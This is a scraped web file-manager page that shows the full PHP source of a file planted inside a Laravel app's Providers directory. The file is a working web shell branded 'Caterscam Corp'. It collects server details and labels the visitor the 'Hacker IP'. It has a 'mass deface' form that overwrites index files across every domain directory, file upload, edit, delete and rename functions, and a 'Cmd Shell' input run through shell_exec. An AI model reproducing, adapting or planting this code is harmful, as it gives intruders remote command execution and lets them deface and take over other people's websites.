489495df
芝麻web文件管理
芝麻web文件管理V1.00
489495df
编辑当前文件:/home/landifun/www/app/Providers/581925/index.php
489495df<?PHP // Include Teko font from Google Fonts and Font Awesome echo '<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Teko:wght@400;500;600;700&display=swap">'; echo '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">'; // Apply Teko font to the entire page and set colors echo '<style> body { font-family: "Teko", sans-serif; background-color: #4A2C2A; /* Dark brown background */ color: yellow; /* Yellow font */ } h3, th, td { font-family: "Teko", sans-serif; color: yellow; } input[type="text"], input[type="file"], input[type="submit"] { font-family: "Teko", sans-serif; color: yellow; background-color: black; } textarea { color: yellow; background-color: black; } a { color: yellow; } table { color: yellow; } /* Styles for the mass deface link */ #massDefaceLink { display: inline-block; padding: 10px 30px; /* Adjust padding for a more elongated shape */ border-radius: 25px; /* Makes it oval */ background-color: rgba(0, 0, 0, 0.5); /* Optional: Add background color */ transition: background-color 0.3s; cursor: pointer; } #massDefaceLink:hover { background-color: rgba(255, 255, 0, 0.3); /* Optional: Change color on hover */ } </style>'; // ASCII Art echo '<div style="text-align: center; font-family: monospace; white-space: pre;">'; echo "\n"; echo " ██████ █████ ████████ ███████ ██████ ███████ ██████ █████ ███ ███ ██████ ██████ ██████ ██████ ██ ██ ██████ ██████ \n"; echo "██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ \n"; echo "██ ███████ ██ █████ ██████ ███████ ██ ███████ ██ ████ ██ ██ ██ ██ ██████ ██████ ██ ██ █████ ██ ██ ██ \n"; echo "██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ \n"; echo " ██████ ██ ██ ██ ███████ ██ ██ ███████ ██████ ██ ██ ██ ██ ██████ ██████ ██ ██ ██ ████ ██████ ██ ██████ \n"; echo '</div>'; // Display system information echo "<h3>Server Info:</h3>"; echo "Uname: " . php_uname() . "<br>"; echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<br>"; echo "PHP Version: " . phpversion() . "<br>"; echo "Server IP: " . $_SERVER['SERVER_ADDR'] . "<br>"; echo "Hacker IP: " . $_SERVER['REMOTE_ADDR'] . "<br>"; echo "HDD: " . disk_free_space("/") . " bytes free of " . disk_total_space("/") . " bytes total<br>"; echo "User: " . get_current_user() . "<br>"; echo "Group: " . posix_getgrgid(posix_getegid())['name'] . "<br>"; echo "Home Shell: " . getcwd() . "<br><br>"; // Mass Deface Link echo '<div style="text-align: center; margin: 20px 0;"> <span id="massDefaceLink" onclick="toggleMassDefaceForm()"> mass deface </span> <div id="massDefaceForm" style="display: none; margin-top: 10px;"> <form method="POST"> <label>Enter directory path (e.g., /var/www/):</label><br> <input type="text" name="mass_deface_path" style="width: 100%;" required><br><br> <label>Save to (filename.ext):</label><br> <input type="text" name="deface_filename" style="width: 100%;" placeholder="index.html" required><br><br> <label>Deface content (HTML or other):</label><br> <textarea name="deface_content" style="width: 100%; height: 200px;" required></textarea><br> <input type="submit" name="mass_deface_submit" value="Execute Deface" style="margin-top: 10px;"> </form> </div> </div>'; echo "<script> function toggleMassDefaceForm() { var form = document.getElementById('massDefaceForm'); form.style.display = (form.style.display === 'none' || form.style.display === '') ? 'block' : 'none'; } </script>"; // Handle Mass Deface Submission if (isset($_POST['mass_deface_submit'])) { $defacePath = realpath($_POST['mass_deface_path']); $defaceContent = $_POST['deface_content']; $defaceFilename = $_POST['deface_filename']; // Check if directory is valid and readable if (is_dir($defacePath) && is_readable($defacePath)) { $domains = []; // Store the affected domains $entries = scandir($defacePath); foreach ($entries as $entry) { $entryPath = $defacePath . '/' . $entry; // Only target directories that look like domain names if (is_dir($entryPath) && preg_match('/\.[a-z]{2,}$/i', $entry)) { $targetFile = $entryPath . '/' . $defaceFilename; // Custom file name // Ensure the file is writable or can be created if (!file_exists($targetFile) || is_writable($targetFile)) { file_put_contents($targetFile, $defaceContent); $domains[] = $entry . '/' . $defaceFilename; // Add domain to affected list } } } // Display success message with affected domains if (!empty($domains)) { echo "<h3>Mass Deface Successful. Affected Sites:</h3><ul>"; foreach ($domains as $domain) { echo "<li>$domain</li>"; } echo "</ul>"; } else { echo "<h3>No domain directories found or no writable files to deface.</h3>"; } } else { echo "<h3>Invalid directory or permission denied.</h3>"; } } // Helper function to get file permissions in symbolic format function getPermissions($file) { $perms = fileperms($file); $symbolic = ''; // File type if (($perms & 0xC000) == 0xC000) { $symbolic = 's'; // Socket } elseif (($perms & 0xA000) == 0xA000) { $symbolic = 'l'; // Symbolic Link } elseif (($perms & 0x8000) == 0x8000) { $symbolic = '-'; // Regular file } elseif (($perms & 0x6000) == 0x6000) { $symbolic = 'b'; // Block special } elseif (($perms & 0x4000) == 0x4000) { $symbolic = 'd'; // Directory } elseif (($perms & 0x2000) == 0x2000) { $symbolic = 'c'; // Character special } elseif (($perms & 0x1000) == 0x1000) { $symbolic = 'p'; // FIFO pipe } else { $symbolic = 'u'; // Unknown } // Owner permissions $symbolic .= (($perms & 0x0100) ? 'r' : '-') . (($perms & 0x0080) ? 'w' : '-') . (($perms & 0x0040) ? 'x' : '-'); // Group permissions $symbolic .= (($perms & 0x0020) ? 'r' : '-') . (($perms & 0x0010) ? 'w' : '-') . (($perms & 0x0008) ? 'x' : '-'); // Other permissions $symbolic .= (($perms & 0x0004) ? 'r' : '-') . (($perms & 0x0002) ? 'w' : '-') . (($perms & 0x0001) ? 'x' : '-'); return $symbolic; } // Get current directory path $current_dir = getcwd(); // If navigating to a directory if (isset($_GET['path'])) { $path = realpath($_GET['path']); if ($path && is_dir($path)) { if (is_readable($path)) { // Check if directory is readable chdir($path); $current_dir = $path; } else { echo "<h3>Access Denied</h3>"; } } } // Handle deletion of selected files or directories if (isset($_GET['delete_item'])) { $item_path = realpath(urldecode($_GET['delete_item'])); if (is_file($item_path)) { unlink($item_path); echo "<script>alert('File deleted successfully.');</script>"; } elseif (is_dir($item_path)) { rmdir($item_path); echo "<script>alert('Directory deleted successfully.');</script>"; } echo "<script>window.location.href = window.location.pathname;</script>"; } // Handle renaming of files or directories if (isset($_GET['rename_item']) && isset($_GET['new_name'])) { $current_name = realpath(urldecode($_GET['rename_item'])); $new_name = dirname($current_name) . '/' . urldecode($_GET['new_name']); rename($current_name, $new_name); echo "<script>alert('Item renamed successfully.');</script>"; // Redirect to refresh the file list echo "<script>window.location.href = window.location.pathname;</script>"; } // File Editing if (isset($_POST['edit_file']) && isset($_POST['file_content'])) { $file = realpath(urldecode($_POST['edit_file'])); $content = $_POST['file_content']; // Ensure the file exists and is writable if (is_file($file) && is_writable($file)) { if (file_put_contents($file, $content) !== false) { echo "<script> alert('File \"" . htmlspecialchars(basename($file)) . "\" edited successfully.'); window.location.href = window.location.pathname; </script>"; } else { echo "<script> alert('Failed to edit file \"" . htmlspecialchars(basename($file)) . "\".'); </script>"; } } else { echo "<script> alert('File does not exist or is not writable.'); </script>"; } exit(); } // Handle file editing display if (isset($_GET['edit_item'])) { $edit_item = realpath(urldecode($_GET['edit_item'])); if (is_file($edit_item) && is_readable($edit_item)) { $file_content = file_get_contents($edit_item); echo "<h3>Editing: " . htmlspecialchars(basename($edit_item)) . "</h3>"; echo "<form method='POST' action='?'> <textarea name='file_content' style='width: 100%; height: 400px;'>". htmlspecialchars($file_content) ."</textarea><br> <input type='hidden' name='edit_file' value='" . urlencode($edit_item) . "'> <input type='submit' value='Save'> </form>"; exit(); } else { echo "<h3>File not found or not readable.</h3>"; } } // Include this CSS in your style section echo '<style> /* Hide the "No files chosen" text */ input[type="file"]::file-selector-button { display: none; } </style>'; // Upload Form echo "<form enctype='multipart/form-data' method='POST' id='fileForm'> <div style='margin-bottom: 10px;'> <input type='file' name='upload' id='fileInput' onchange='this.form.submit();' style='width: 100%;'> </div> <div> <input type='text' name='cmd' placeholder='Cmd Shell' style='width: 100%;'> </div> </form>"; // File Upload Handler if (isset($_FILES['upload'])) { $target_path = basename($_FILES['upload']['name']); if (move_uploaded_file($_FILES['upload']['tmp_name'], $target_path)) { echo "<script>alert('File " . basename($_FILES['upload']['name']) . " uploaded successfully.');</script>"; echo "<script>window.location.href = window.location.pathname;</script>"; } else { echo "<script>alert('Upload failed.');</script>"; } } // Terminal Command Handler if (isset($_POST['cmd']) && !empty($_POST['cmd'])) { $cmd = escapeshellcmd($_POST['cmd']); $output = shell_exec($cmd); echo "<h3>Command Output:</h3><pre>$output</pre>"; } // JavaScript for handling form submission echo "<script> document.getElementById('fileForm').addEventListener('submit', function(event) { var fileInput = document.getElementById('fileInput'); var cmdInput = document.querySelector('input[name=\"cmd\"]'); // Check if file input is empty and cmd input is not empty if (fileInput.files.length === 0 && cmdInput.value.trim() === '') { event.preventDefault(); alert('Please choose a file to upload.'); } }); document.querySelector('input[name=\"cmd\"]').addEventListener('keypress', function(event) { // Only handle the enter key to submit the command if (event.key === 'Enter') { event.preventDefault(); var cmd = this.value.trim(); if (cmd) { // Create a form to submit the command var form = document.createElement('form'); form.method = 'POST'; form.style.display = 'none'; var input = document.createElement('input'); input.type = 'hidden'; input.name = 'cmd'; input.value = cmd; form.appendChild(input); document.body.appendChild(form); form.submit(); } } }); </script>"; // File Explorer Layout echo "<h3>File Explorer:</h3>"; // Display the path breadcrumb $path_parts = explode('/', trim($current_dir, '/')); $breadcrumb = ''; for ($i = 0; $i < count($path_parts); $i++) { $current_part = implode('/', array_slice($path_parts, 0, $i + 1)); $breadcrumb .= "<a href='?path=" . urlencode('/' . $current_part) . "'>" . htmlspecialchars($path_parts[$i]) . "</a> / "; } echo rtrim($breadcrumb, ' / '); // File explorer table echo "<table border='1' cellpadding='5' style='width: 100%;'>"; echo "<tr style='text-align: center;'>"; echo "<th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th>"; echo "</tr>"; // Add ".." for parent directory link if ($current_dir != '/') { echo "<tr>"; echo "<td style='text-align: left;'> <i class='fas fa-folder'></i> <a href='?path=" . urlencode(dirname($current_dir)) . "'>..</a></td>"; // Parent directory link echo "<td style='text-align: center;'>dir</td>"; echo "<td style='text-align: center;'>-</td>"; echo "<td style='text-align: center;'>-</td>"; echo "<td style='text-align: center;'>-</td>"; echo "<td style='text-align: center;'></td>"; echo "</tr>"; } // Separate directories and files $dirs = []; $files = []; $entries = scandir($current_dir); foreach ($entries as $entry) { if ($entry !== "." && $entry !== "..") { $path = $current_dir . '/' . $entry; if (is_dir($path)) { $dirs[] = $entry; } else { $files[] = $entry; } } } // Sort directories and files sort($dirs); sort($files); // Display directories foreach ($dirs as $dir) { $file_path = $current_dir . '/' . $dir; $file_size = 'dir'; $file_modify = date("Y-m-d H:i:s", filemtime($file_path)); $file_owner = posix_getpwuid(fileowner($file_path))['name'] . '/' . posix_getgrgid(filegroup($file_path))['name']; $file_permissions = getPermissions($file_path); echo "<tr>"; echo "<td style='text-align: left;'><i class='fas fa-folder'></i> <a href='?path=" . urlencode($file_path) . "'>$dir</a></td>"; echo "<td style='text-align: center;'>$file_size</td>"; echo "<td style='text-align: center;'>$file_modify</td>"; echo "<td style='text-align: center;'>$file_owner</td>"; echo "<td style='text-align: center;'>$file_permissions</td>"; echo "<td style='text-align: center;'>"; echo "<a href='#' onclick='confirmDelete(\"" . urlencode($file_path) . "\")'>[Delete]</a> "; echo "<a href='#' onclick='confirmRename(\"" . urlencode($file_path) . "\")'>[Rename]</a>"; echo "</td>"; echo "</tr>"; } // Display files foreach ($files as $file) { $file_path = $current_dir . '/' . $file; $file_size = filesize($file_path) . ' B'; $file_modify = date("Y-m-d H:i:s", filemtime($file_path)); $file_owner = posix_getpwuid(fileowner($file_path))['name'] . '/' . posix_getgrgid(filegroup($file_path))['name']; $file_permissions = getPermissions($file_path); echo "<tr>"; echo "<td style='text-align: left;'><i class='fas fa-file'></i> <a href='?path=" . urlencode($file_path) . "'>$file</a></td>"; echo "<td style='text-align: center;'>$file_size</td>"; echo "<td style='text-align: center;'>$file_modify</td>"; echo "<td style='text-align: center;'>$file_owner</td>"; echo "<td style='text-align: center;'>$file_permissions</td>"; echo "<td style='text-align: center;'>"; echo "<a href='?edit_item=" . urlencode($file_path) . "'> [Edit]</a> "; echo "<a href='?delete_item=" . urlencode($file_path) . "' onclick='return confirm(\"Are you sure?\")'>[Delete]</a> "; echo "<a href='#' onclick='confirmRename(\"" . urlencode($file_path) . "\")'>[Rename]</a>"; echo "</td>"; echo "</tr>"; } echo "</table>"; // JavaScript functions for delete and rename confirmation echo "<script> function confirmDelete(path) { if (confirm('Are you sure you want to delete this item?')) { window.location.href = '?delete_item=' + path; } } function confirmRename(path) { var newName = prompt('Enter new name for the item:'); if (newName) { window.location.href = '?rename_item=' + path + '&new_name=' + encodeURIComponent(newName); } } </script>"; echo '<div style="text-align: center; margin-top: 20px; padding: 10px; background-color: #4A2C2A; border-top: 1px solid #ddd;">'; echo '<a href="https://t.me/caterscam" style="color: yellow; text-decoration: none;">© 2024 Caterscam Corp</a>'; echo '</div>'; ?>
Not Found
404
Not Found